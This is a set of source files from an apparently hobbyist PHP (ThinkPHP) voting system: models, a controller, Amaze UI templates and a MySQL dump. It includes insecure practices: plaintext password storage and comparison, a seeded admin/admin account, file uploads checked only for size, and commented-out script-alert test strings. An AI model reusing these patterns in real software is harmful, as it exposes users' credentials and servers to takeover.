$this->where($option)->update(['number' => $number]);
}
}
/**根据id获取该选项
* @param int $optionId
* @return mixed
*/
public function getOneOptionById(int $optionId) : array {
$where = array(
"id" => $optionId,
);
$result = $this->where($where)->select();
return $result[0]->data;
}
}<file_sep><?php
/**
* 显示所有投票
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/10
* Time: 21:57
*/
?>
<!doctype html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="viewport"
content="width=device-width, initial-scale=1">
<title>投票系统</title>
<!-- Set render engine for 360 browser -->
<meta name="renderer" content="webkit">
<!-- No Baidu Siteapp-->
<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link rel="icon" type="image/png" href="">
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Amaze UI"/>
<link rel="apple-touch-icon-precomposed" href="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<meta name="msapplication-TileColor" content="#0e90d2">
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.2/css/amazeui.min.css">
</head>
<body>
{$header}
<span class="am-show-md-down">
<div class="am-g">
<div class="am-u-sm-12">
<ul class="am-list am-list-static am-list-border">
{volist name='list' id='vote'}
<li>
<div data-am-widget="list_news" class="am-list-news am-list-news-default" >
<!--列表标题-->
<div class="am-list-news-hd am-cf">
<!--带更多链接-->
{if condition="(strtotime($vote.end_time) > time())"}
<a href="{$Think.config.WEB_ROOT}/public/index.php/index/Index/votingPage?id={$vote.id}" class="">
<h2>{$vote.title}</h2>
<span class="am-list-news-more am-fr">{$vote.end_time}截至 | 投票 »</span>
</a>
{else /}
<a href="{$Think.config.WEB_ROOT}/public/index.php/index/Index/resultPage?id={$vote.id}" class="">
<h2>{$vote.title}</h2>
<span class="am-list-news-more am-fr"> 查看结果 »</span>
<span class="am-list-news-more am-btn-danger am-fr">投票已结束</span>
</a>
{/if}
</div>
<div class="am-list-news-bd">
<ul class="am-list">
<li class="am-g am-list-item-dated">
<p>{$vote.introduction}</p>
</li>
</ul>
</div>
</li>
{/volist}
</ul>
<div class="am-g">
<div class="am-u-sm-4"> </div>
<div id="page" class="am-u-sm-4">
{$list->render()}
</div>
<div class="am-u-sm-4"> </div>
</div>
</div>
</div>
</span>
<span class="am-show-lg-only">
<div class="am-g">
<div class="am-u-sm-2"> </div>
<div class="am-u-sm-8">
<ul class="am-list am-list-static am-list-border">
{volist name='list' id='vote'}
<li>
<div data-am-widget="list_news" class="am-list-news am-list-news-default" >
<!--列表标题-->
<div class="am-list-news-hd am-cf">
<!--带更多链接-->
{if condition="(strtotime($vote.end_time) > time())"}
<a href="{$Think.config.WEB_ROOT}/public/index.php/index/Index/votingPage?id={$vote.id}" class="">
<h2>{$vote.title}</h2>
<span class="am-list-news-more am-fr">{$vote.end_time}截至 | 投票 »</span>
</a>
{else /}
<a href="{$Think.config.WEB_ROOT}/public/index.php/index/Index/resultPage?id={$vote.id}" class="">
<h2>{$vote.title}</h2>
<span class="am-list-news-more am-fr"> 查看结果 »</span>
<span class="am-list-news-more am-btn-danger am-fr">投票已结束</span>
</a>
{/if}
</div>
<div class="am-list-news-bd">
<ul class="am-list">
<li class="am-g am-list-item-dated">
<p>{$vote.introduction}</p>
</li>
</ul>
</div>
</li>
{/volist}
</ul>
<div class="am-g">
<div class="am-u-sm-4"> </div>
<div id="page" class="am-u-sm-4">
{$list->render()}
</div>
<div class="am-u-sm-4"> </div>
</div>
</div>
<div class="am-u-sm-2"> </div>
</div>
</span>
{$footer}
<!--[if (gte IE 9)|!(IE)]><!-->
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<!--<![endif]-->
<!--[if lte IE 8 ]>
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/modernizr/2.8.3/modernizr.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.ie8polyfill.min.js"></script>
<![endif]-->
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/votePage.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/header.js"></script>
<script>
var rootUrl = "{$Think.config.WEB_ROOT}";
var name = "{$user.name}";
var admin = "{$user.admin}";
</script>
</body>
</html>
<file_sep><?php
/**
* 投票选项log
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/12
* Time: 22:35
*/
namespace app\index\model;
use think\Model;
class OptionLog extends Model {
/**
* 添加选项记录
* @param array $postVoting
* @param string $username
*/
public function addLog(array $postVoting, string $username) {
$data = [];
foreach ($postVoting as $item) {
$data[] = [
'op_time' => date("Y-m-d H:i:s"),
'log' => $item,
'username' => $username
];
}
$this->saveAll($data);
}
public function getResult(array $optionIds) : array {
$newResult = [];
foreach ($optionIds as $value) {
$newResult[$value] = $this->where("log", $value)->column("username");
}
return $newResult;
}
}<file_sep><?php
/**
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/13
* Time: 0:24
*/
?>
<!doctype html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="viewport"
content="width=device-width, initial-scale=1">
<title>添加用户</title>
<!-- Set render engine for 360 browser -->
<meta name="renderer" content="webkit">
<!-- No Baidu Siteapp-->
<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link rel="icon" type="image/png" href="">
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Amaze UI"/>
<link rel="apple-touch-icon-precomposed" href="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="http://cdn.amazeui.org/amazeui/2.7.2/i/app-icon72x72@2x.png">
<meta name="msapplication-TileColor" content="#0e90d2">
<link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.2/css/amazeui.min.css">
</head>
<body>
{$header}
<div class="am-container">
</div>
<div class="am-g">
<div class="am-u-lg-3">
</div>
<div class="am-u-lg-6">
<!-- 移动端适配 -->
<span class="am-show-md-down">
<form class="am-form">
<fieldset>
<legend>
<h2 class="am-titlebar-title" style="color: #0e90d2">
Register
</h2>
</legend>
<div class="am-form-group">
<label for="doc-ipt-email-1">账号</label>
<input type="text" class="account" placeholder="请输入账号">
<span>(只能输入数字,下划线,字母,且不能以下划线作为开头和结尾)</span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">密码</label>
<input type="password" class="pwd1" placeholder="请输入密码">
<span>(只能输入数字,下划线,字母,且不能以下划线作为开头和结尾)</span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">确认密码</label>
<input type="password" class="pwd2" placeholder="请再次输入密码">
</div>
<div class="am-form-group">
<label for="doc-select-1">等级</label>
<select class="grade" id="doc-select-1">
<option value="">请选择</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-select-1">开启管理员权限</label>
<select class="admin" id="doc-select-1">
<option value="">请选择</option>
<option value="1">是</option>
<option value="0">否</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">验证码</label>
<div class="am-g">
<div class="am-u-sm-7">
<input type="text" class="captcha" placeholder="请输入右侧四位验证码"></div>
<div class="am-u-sm-5"><img class="captchaImg" src="{:captcha_src()}" alt="captcha" /></div>
</div>
</div>
<button type="button" class="am-btn am-btn-primary am-btn-block">登 陆</button>
</fieldset>
</form>
</span>
<!-- PC端适配 -->
<span class="am-show-lg-only">
<form class="am-form">
<fieldset>
<legend>
<h2 class="am-titlebar-title" style="color: #0e90d2">
Register
</h2>
</legend>
<div class="am-form-group">
<label for="doc-ipt-email-1">账号</label>
<input type="text" class="account" placeholder="请输入登陆账号">
<span>(只能输入数字,下划线,字母,且不能以下划线作为开头和结尾)</span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">密码</label>
<input type="<PASSWORD>" class="pwd1" placeholder="<PASSWORD>">
<span>(只能输入数字,下划线,字母,且不能以下划线作为开头和结尾)</span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">确认密码</label>
<input type="password" class="pwd2" placeholder="请再次输入密码">
</div>
<div class="am-form-group">
<label for="doc-select-1">等级</label>
<select class="grade" id="doc-select-1">
<option value="">请选择</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-select-1">开启管理员权限</label>
<select class="admin" id="doc-select-1">
<option value="">请选择</option>
<option value="1">是</option>
<option value="0">否</option>
</select>
<span class="am-form-caret"></span>
</div>
<div class="am-form-group">
<label for="doc-ipt-pwd-1">验证码</label>
<div class="am-g">
<div class="am-u-sm-7"><input type="text" class="captcha" placeholder="请输入右侧四位验证码"></div>
<div class="am-u-sm-5"><img class="captchaImg" src="{:captcha_src()}" alt="captcha" />点击图片刷新</div>
</div>
</div>
<button type="button" class="am-btn am-btn-primary am-btn-block">添 加</button>
</fieldset>
</form>
</span>
</div>
<div class="am-u-lg-3">
<span class="am-show-md-down"> </span>
<span class="am-show-lg-only"> </span>
</div>
</div>
<!--交互信息提示-->
<div id="response">
</div>
{$footer}
<!--[if (gte IE 9)|!(IE)]><!-->
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
<!--<![endif]-->
<!--[if lte IE 8 ]>
<script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.staticfile.org/modernizr/2.8.3/modernizr.js"></script>
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.ie8polyfill.min.js"></script>
<![endif]-->
<script src="http://cdn.amazeui.org/amazeui/2.7.2/js/amazeui.min.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/header.js"></script>
<script src="{$Think.config.WEB_ROOT}/public/static/js/addUser.js"></script>
<script>
var captchaUrl = "{:captcha_src()}";
var rootUrl = "{$Think.config.WEB_ROOT}";
var name = "{$user.name}";
var admin = "{$user.admin}";
var grade = "{$user.grade}";
</script>
</body>
</html>
<file_sep><?php
/**
* 投票log
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/12
* Time: 22:31
*/
namespace app\index\model;
use think\Model;
class VoteLog extends Model {
/**
* 添加用户投票记录
* @param int $voteId
* @param string $opName
*/
public function addLog(int $voteId, string $opName) {
$data = [
'log' => $voteId,
'vote_time' => date("Y-m-d H:i:s"),
'username' => $opName
];
$this->save($data);
}
/**
* 判断是否已经投过票
* @param int $voteId
* @param string $opName
* @return bool
*/
public function isVote(int $voteId, string $opName) : bool {
$where = [
'log' => $voteId,
'username' => $opName
];
return $this->where($where)->count();
}
}<file_sep><?php
/**
* Vote Model
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/11
* Time: 0:06
*/
namespace app\index\model;
use think\Model;
define("PAGE_NUMBER", 10);
class Vote extends Model {
public function getVoteByGrade(int $grade) {
$grade = $grade + 1;
return $this->where("grade", "<", $grade)->order("create_time desc")->paginate(PAGE_NUMBER);
}
/**
* 增加投票
* @param array $vote
* @return int 返回新添加的投票的id
*/
public function addVote(array $vote) : int {
$this->save($vote);
$result = $this->where($vote)->select();
return ($result[0]->data)['id'];
}
/**
* 根据id判断投票是否存在
* @param int $id
* @return bool
*/
public function hasVote(int $id) : bool {
$where = array(
"id" => $id,
);
$result = $this->where($where)->select();
return count($result) > 0;
}
public function getVoteById(int $id) : array {
$where = array(
"id" => $id,
);
$result = $this->where($where)->select();
return $result[0]->data;
}
}<file_sep><?php
namespace app\index\controller;
use app\index\model\Option;
use app\index\model\OptionLog;
use app\index\model\User;
use app\index\model\Vote;
use app\index\model\VoteLog;
use think\Controller;
use think\Request;
use think\Session;
class Index extends Controller {
public function index() {
return $this->fetch('login', ['footer' => footer()]);
}
/**
* 登陆检查
* @return string
*/
public function loginCheck() : string {
$user = new User();
$status = "error";
$message = "";
$postData = Request::instance()->post("");
if (isset($postData['account']) && isset($postData['pwd']) && isset($postData['captcha'])) {
$captchaJudge = $this->validate(array('captcha' => $postData['captcha']), ['captcha|验证码'=>'require|captcha']);
if ($captchaJudge === true) {
if ($user->loginCheck($postData['account'], $postData['pwd'])) {
$status = "success";
$message = "";
Session::set("name", $postData['account']);
} else {
$status = "error";
$message = "账号或者密码错误";
}
} else {
$status = "error";
$message = "验证码错误";
};
} else {
$status = "error";
$message = "请完整填写登录信息";
}
return json_encode(["message" => $message, "status" => $status]);
}
/**
* 登出
* @return string
*/
public function logout() : string {
if (Session::has("name")) {
Session::delete("name");
return json_encode(["status" => "success", "message" => "登出成功"]);
} else {
return json_encode(["status" => "error", "message" => "登出失败,你还没登陆"]);
}
}
/**
* 显示所有投票
* @return mixed
*/
public function votePage() {
$user = new User();
$vote = new Vote();
if ($this->isLogin()) {
$name = Session::get("name");
$userInfor = $user->getUser($name);
$grade = $userInfor['grade'];
$admin = $userInfor['admin'];
} else {
$grade = 0;
$admin = 0;
$name = "";
}
$voteList = $vote->getVoteByGrade($grade);
return $this->fetch('votePage', ['list' => $voteList, 'header' => getHeader("投票系统"), 'footer' => footer(), 'user' => ['name' => $name, 'admin' => $admin]]);
}
/**
* 显示添加投票页面
* @return mixed
*/
public function createVote() {
$user = new User();
if ($this->isLogin()) {
$name = Session::get("name");
$userInfor = $user->getUser($name);
$grade = $userInfor['grade'];
$admin = $userInfor['admin'];
} else {
$name = "";
$admin = 0;
$grade = 0;
$this->error('登陆后方可发起投票', 'index');
}
return $this->fetch('addVote', ['header' => getHeader("发起投票—投票系统"), 'footer' => footer(), 'user' => ['name' => $name, 'admin' => $admin, 'grade' => $grade]]);
}
/**
* 添加投票,数据处理
* @return string
*/
public function addVote(){
$status = "error";
$message = "操作失败";
if ($this->isLogin()) {
$imgOption = request()->file();
$postMessage = Request::instance()->post();
$imgOption == null ? $imgOption = array() : null;
if ($this->isVote($postMessage)) {
$status = "success";
} else {
$status = "error";
$message = "信息不完整";
}
if ($status == "success") {
$captchaJudge = $this->validate(array('captcha' => $postMessage['captcha']), ['captcha|验证码'=>'require|captcha']);
if ($captchaJudge === true) {
$result = $this->saveVote($postMessage);
if ($result['status']) {
$result = $this->saveOption($result['voteId'], $imgOption, $postMessage['option']);
}
$status = $result['status'] ? "success" : "error";
$message = $result['message'];
} else {
$message = "验证码错误";
}
}
} else {
$message = "还未登录,不能进行此操作";
}
return json_encode(['status' => $status, 'message' => $message]);
}
/**
* 根据发送所来的信息判断是否符合一个投票的要求
* @param array $postMessage
* @return bool
*/
private function isVote(array $postMessage) : bool {
$is = false;
$requireMessage = ["title", "endTime", "ano", "number", "captcha", "intro", "grade", "option"];
foreach ($postMessage as $key => $value) {
if (in_array($key, $requireMessage) && $value != "") {
$is = true;
continue;
} else {
$is = false;
break;
}
}
return $is;
}
/**
* 保存投票
* @param array $postVote
* @return array 包含新增投票id,是否增加成功
*/
private function saveVote(array $postVote) : array {
$user = new User();
$vote = new Vote();
$userInfor = $user->getUser(Session::get("name"));
if ($userInfor['grade'] < $postVote['grade']) {
return ['status' => false, 'message' => "发起的投票等级比用户等级高"];
}
$newVote = [
"create_time" => date('Y-m-d H:i:s'),
"title" => $postVote['title'],
"introduction" => $postVote['intro'],
"grade" => $postVote['grade'],
"end_time" => $postVote['endTime'],
"create_name" => Session::get("name"),
"anonymity" => $postVote['ano'],
"vote_number" => $postVote['number']
];
$id = $vote->addVote($newVote);
return ['status' => true, 'voteId' => $id];
}
/**
* 保存选项
* @param int $voteId 添加选项的投票id
* @param array $imgOption 图片选项
* @param string $textOption 文字选项
* @return array ['status' => , 'message' =>]
*/
private function saveOption(int $voteId, array $imgOption, string $textOption) : array {
$textOption = (Array)json_decode(htmlspecialchars_decode($textOption), true);
$newOption = [];
foreach ($textOption as $key => $value) {
if ($key != "" && $value != "") {
$newOption[] = [
"vote_id" => $voteId,
"img" => "null",
"content" => $value
];
}
}
if (count($imgOption) > 0) {
foreach($imgOption as $key => $file){
// 移动到框架应用根目录/public/uploads/ 目录下
$info = $file->validate(['size' => 2048 * 1024])->move(ROOT_PATH . 'public' . DS . 'uploads');
if($info){
$newOption[] = [
"content" => explode("_", $key)[0] == "null0" ? "null0_" : $key,
"vote_id" => $voteId,
"img" => $info->getSaveName(),
];
}else{
// 上传失败获取错误信息
$newOption[] = [
"content" => explode("_", $key)[0] == "null0" ? "null0_" : $key,
"vote_id" => $voteId,
"img" => "",
];
}
}
}
$option = new Option();
$option->addOption($newOption);
return ['status' => true, 'message' => "成功发起投票"];
}
/**
* 显示投票界面
* @return mixed
*/
public function votingPage() {
if ($this->isLogin()) {
$id = Request::instance()->get("id");
$user = new User();
$vote = new Vote();
$option = new Option();
//投票信息
$voteInfo = $vote->getVoteById($id);
$name = Session::get("name");
//用户信息
$userInfor = $user->getUser($name);
$grade = $userInfor['grade'];
$admin = $userInfor['admin'];
//选项信息
$optionInfo = $option->getAllOptionById($id);
if (!$vote->hasVote($id)) {
$this->error("投票不存在");
} elseif ($grade < $voteInfo['grade']) {
$this->error('等级不够', 'index');
} elseif ($this->isEnd($id)) {
$this->error("投票已结束");
} else {
return $this->fetch('votingPage',
[
'optionList' => $optionInfo,
'vote' => $voteInfo,
'header' => getHeader("投票"),
'footer' => footer(),
'user' => ['name' => $name, 'admin' => $admin, 'grade' => $grade]
]);
}
} else {
$name = "";
$admin = 0;
$grade = 0;
$this->error('登陆后方可投票', 'index');
}
}
/**
* 根据投票id判断投票是否结束
* @param $voteId
* @return bool
*/
private function isEnd($voteId) : bool {
$vote = new Vote();
$voteInfo = $vote->getVoteById($voteId);
return strtotime($voteInfo['end_time']) < time();
}
public function voting() {
$status = "error";
$message = "操作失败";
if ($this->isLogin()) {
$postVoting = Request::instance()->post();
$voteId = $postVoting['id'];
unset($postVoting['id']);
$postVoting = array_unique($postVoting);
$vote = new Vote();
$option = new Option();
$user = new User();
$voteLog = new VoteLog();
$optionLog = new OptionLog();
$username = Session::get("name");
if (!$vote->hasVote($voteId)) {
$message = '投票不存在';
} elseif (!$this->isOption($voteId, $postVoting)) {
$message = '所选选项不是该投票的';
} elseif ($this->isEnd($voteId)) {
$message = '投票已结束';
} elseif ($voteLog->isVote($voteId, $username)) {
$message = '已投过票';
} else {
$voteInfo = $vote->getVoteById($voteId);
$userInfo = $user->getUser($username);
if ($voteInfo['grade'] > $userInfo['grade']) {
$message = "等级不够";
} elseif ($voteInfo['vote_number'] < count($postVoting)) {
$message = "投票数超过最大投票数";
}
else {
$option->addNumber($postVoting);
$optionLog->addLog($postVoting, $username);
$voteLog->addLog($voteId, $username);
$status = "success";
$message = "投票成功";
}
}
} else {
$this->error('登陆后方可投票', 'index');
}
return json_encode(['status' => $status, 'message' => $message]);
}
/**
* 判断投票选项是不是对应的投票
* @param int $voteId
* @param array $voting
* @return bool
*/
private function isOption(int $voteId, array $voting) : bool {
$option = new Option();
$optionId = $option->getAllOptionIdByVoteId($voteId);
$isOption = false;
foreach ($voting as $key => $value) {
if (in_array($value, $optionId)) {
$isOption = true;
continue;
} else {
$isOption = false;
break;
}
}
return $isOption;
}
public function resultPage() {
if ($this->isLogin()) {
$id = Request::instance()->get("id");
$vote = new Vote();
$user = new User();
//投票信息
$voteInfo = $vote->getVoteById($id);
$name = Session::get("name");
$userInfo = $user->getUser($name);
//选项信息
if (!$vote->hasVote($id)) {
$this->error("投票不存在");
} else {
$option = new Option();
$optionInfo = $option->getAllOptionById($id);
if ($voteInfo['anonymity'] == 1) {
return $this->fetch('resultPage',
[
'optionList' => $optionInfo,
'vote' => $voteInfo,
'header' => getHeader("投票结果"),
'footer' => footer(),
'user' => ['name' => $name]
]);
} else if ($voteInfo['grade'] > $userInfo['grade']) {
$this->error("等级不够");
} else {
$optionId = $option->getAllOptionIdByVoteId($id);
$optionLog = new OptionLog();
$optionLogs = $optionLog->getResult($optionId);
return $this->fetch('resultPage',
[
'optionLog' => $optionLogs,
'optionList' => $optionInfo,
'vote' => $voteInfo,
'header' => getHeader("投票结果"),
'footer' => footer(),
'user' => ['name' => $name]
]);
}
}
} else {
$this->error('登陆后方可投票', 'index');
}
}
/**
* 显示添加用户界面
* @return mixed
*/
public function addUserPage() {
$user = new User();
if (!$this->isLogin()) {
$this->error('登陆后方可投票', 'index');
} elseif (!$user->isAdmin(Session::get("name"))) {
$this->error('只有管理员才可以进行该操作', 'index');
} else {
$name = Session::get("name");
$userInfo = $user->getUser($name);
return $this->fetch('addUserPage', [
'user' => ['admin' => 1, 'name' => $name, 'grade' => $userInfo['grade']],
'header' => getHeader("添加用户"),
'footer' => footer(),
]);
}
}
public function addUser() : string {
$status = "error";
$message = "";
$postMessage = Request::instance()->post();
$user = new User();
if (!$this->isLogin()) {
$message = "还未登录,不能进行此操作";
} elseif (!$user->isAdmin(Session::get("name"))) {
$message = "只有管理员才可以进行该操作";
} elseif (!$this->isAddUser($postMessage)) {
$message = "信息不完整";
} elseif ($user->hasUser($postMessage["username"])) {
$message = "该登录名已被注册";
} else {
$captchaJudge = $this->validate(array('captcha' => $postMessage['captcha']), ['captcha|验证码'=>'require|captcha']);
if ($captchaJudge === true) {
if (!preg_match('/^(?!_)(?!.*?_$)[a-zA-Z0-9_]+$/', $postMessage['username'])) {
$message = "用户名非法";
} elseif (!preg_match('/^(?!_)(?!.*?_$)[a-zA-Z0-9_]+$/', $postMessage['pwd1'])) {
$message = "密码非法";
} elseif ($postMessage['pwd1'] != $postMessage['pwd2']) {
$message = "两次密码不一致";
} else {
$userInfo = $user->getUser(Session::get("name"));
if ($userInfo['grade'] < $postMessage['grade']) {
$message = "你不能添加该等级用户";
} else {
$user->addUser($postMessage);
$status = "success";
$message = "注册成功";
}
}
} else {
$message = "验证码错误";
}
}
return json_encode(['status' => $status, 'message' => $message]);
}
/**
* 根据Session判断是否登陆
* @return bool
*/
private function isLogin() : bool {
$user = new User();
return Session::has("name") && $user->hasUser(Session::get("name"));
}
/**
* 判断是否符合添加用户要求
* @param array $postMessage
* @return bool
*/
private function isAddUser(array $postMessage) : bool {
$is = false;
$requireMessage = ["username", "pwd2", "pwd1", "captcha", "admin", "grade"];
foreach ($postMessage as $key => $value) {
if (in_array($key, $requireMessage) && $value != "") {
$is = true;
continue;
} else {
$is = false;
break;
}
}
return $is;
}
public function test() {
// $user = new User();
// var_dump($user->isAdmin("admin"));
// $vote = new Vote();
// return $vote->getVoteByGrade(0);
// dump(json_decode('{"" : "w","" : "w"}', true));
// $files = request()->file();
// foreach($files as $key => $file){
// // 移动到框架应用根目录/public/uploads/ 目录下
// $info = $file->validate(['size' => 2048 * 1024])->move(ROOT_PATH . 'public' . DS . 'uploads');
// if($info){
// echo $key;
// echo $info->getSaveName();
// }else{
// // 上传失败获取错误信息
// echo $file->getError();
// }
// }
// echo date('Y-m-d');
//
// $arr = [];
// for ($i = 0; $i < 4; ++$i) {
// $arr[] = $i;
// }
// dump($arr);
// var_dump(strtotime("2016-2-4 12:3:3") );
// var_dump(time());
// echo "<input type='checkbox' id='1' value='2'><script>alert(document.getElementById('1').value)</script>";
// var_dump(json_decode("{'1':'23',' ':' '}"));
// $string = '{"1":"123","": ""}';
// var_dump($string);
// $string = {"firstName": "Brett"};
// var_dump(json_decode( $string, true));
// $string = "null0_dasdasf";
// var_dump(explode("_",$string)[0]);
// $option = new OptionLog();
// dump($option->addNumber([2 => '13']));
// echo "<script>alert('' + 1)</script>";
// $id = "63";
// dump($option->getResult(['11', '12', '13']));
// dump(in_array("10",$option->getAllOptionIdByVoteId($id)));
// $arr = array(
// "a" => 12,
// );
// dump(in_array("12", $arr));
// $input = ['2' => 3, '3' => 4, '4' => 3];
// $result = array_unique($input);
// dump($result);
echo preg_match('/^(?!_)(?!.*?_$)[a-zA-Z0-9_]+$/',"eqw") ? 'yes' : 'no';
}
}
<file_sep><?php
/**
* User Model
* Created by PhpStorm.
* User: Jehu
* Date: 2017/1/10
* Time: 17:58
*/
namespace app\index\model;
use think\Model;
class User extends Model {
/**
* 添加用户
* @param array $postMessage
*/
public function addUser(array $postMessage) {
$newUser = [
"username" => $postMessage['username'],
"pwd" => $postMessage['<PASSWORD>'],
"grade" => $postMessage['grade'],
"admin" => $postMessage['admin']
];
$this->save($newUser);
}
/**
* 登陆检查
* @param string $cUserName
* @param string $cPwd
* @return int 返回符合条件的数目,0即表示没有,登录失败
*/
public function loginCheck(string $cUserName, string $cPwd) : int {
$where = array(
"username" => $cUserName,
"pwd" => $cPwd
);
return $this->where($where)->count();
}
/**
* 根据姓名判断用户是否存在
* @param string $username
* @return bool
*/
public function hasUser(string $username) : bool {
$where = array(
"username" => $username,
);
return $this->where($where)->count();
}
/**
* 返回个人信息
* @param string $gUserName
* @return false|\PDOStatement|string|\think\Collection
*/
public function getUser(string $gUserName) {
$where = array(
"username" => $gUserName
);
$result = $this->where($where)->select();
return $result[0]->data;
}
/**
* 更具用户名判断是否是管理员
* @param string $username
* @return bool
*/
public function isAdmin(string $username) : bool {
$where = [
"username" => $username
];
$result = $this->where($where)->column("admin");
return $result[0];
}
}<file_sep>/*
Navicat MySQL Data Transfer
Source Server : localhost_3306
Source Server Version : 50505
Source Host : 127.0.0.1:3306
Source Database : vote_system
Target Server Type : MYSQL
Target Server Version : 50505
File Encoding : 65001
Date: 2017-03-20 22:44:36
*/
SET FOREIGN_KEY_CHECKS=0;
-- ----------------------------
-- Table structure for option
-- ----------------------------
DROP TABLE IF EXISTS `option`;
CREATE TABLE `option` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`vote_id` int(11) NOT NULL,
`content` varchar(255) DEFAULT NULL,
`img` varchar(255) DEFAULT NULL,
`number` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of option
-- ----------------------------
INSERT INTO `option` VALUES ('1', '1', 'Go语言', 'null', '1');
INSERT INTO `option` VALUES ('2', '1', 'Linux', '20170226\\cc95a43b36e351ef26a05a9e688e4165.jpg', '1');
INSERT INTO `option` VALUES ('3', '1', 'null0_', '20170226\\dd16d448b7c54287cb81ca4a73b987af.png', '0');
INSERT INTO `option` VALUES ('4', '2', 'Go语言', 'null', '0');
INSERT INTO `option` VALUES ('5', '2', 'Linux', '20170226\\719fdd5c832c5fb23181c388e32cbad8.jpg', '0');
INSERT INTO `option` VALUES ('6', '2', 'null0_', '20170226\\ab32d3857a06ba036bb7453d1dd4e0fb.png', '0');
-- ----------------------------
-- Table structure for option_log
-- ----------------------------
DROP TABLE IF EXISTS `option_log`;
CREATE TABLE `option_log` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`log` varchar(255) DEFAULT NULL,
`op_time` datetime DEFAULT NULL,
`username` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 ROW_FORMAT=COMPACT;
-- ----------------------------
-- Records of option_log
-- ----------------------------
INSERT INTO `option_log` VALUES ('1', '1', '2017-02-26 14:44:41', 'admin');
INSERT INTO `option_log` VALUES ('2', '2', '2017-02-26 14:44:41', 'admin');
-- ----------------------------
-- Table structure for user
-- ----------------------------
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(255) NOT NULL,
`pwd` varchar(255) DEFAULT NULL,
`grade` int(2) DEFAULT NULL,
`admin` int(2) DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of user
-- ----------------------------
INSERT INTO `user` VALUES ('1', 'admin', 'admin', '4', '1');
-- ----------------------------
-- Table structure for vote
-- ----------------------------
DROP TABLE IF EXISTS `vote`;
CREATE TABLE `vote` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`create_name` varchar(255) DEFAULT NULL,
`title` varchar(255) DEFAULT NULL,
`introduction` varchar(255) DEFAULT NULL,
`grade` int(2) DEFAULT NULL,
`end_time` datetime DEFAULT NULL,
`create_time` datetime DEFAULT NULL,
`anonymity` int(2) DEFAULT NULL,
`vote_number` int(11) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of vote
-- ----------------------------
INSERT INTO `vote` VALUES ('1', 'admin', '2017/2/26', '投票介绍', '2', '2017-02-26 14:50:00', '2017-02-26 14:43:42', '0', '2');
INSERT INTO `vote` VALUES ('2', 'admin', '2017/2/26_2', '投票介绍', '1', '2017-02-26 16:00:00', '2017-02-26 14:46:25', '1', '1');
-- ----------------------------
-- Table structure for vote_log
-- ----------------------------
DROP TABLE IF EXISTS `vote_log`;
CREATE TABLE `vote_log` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`vote_time` datetime DEFAULT NULL,
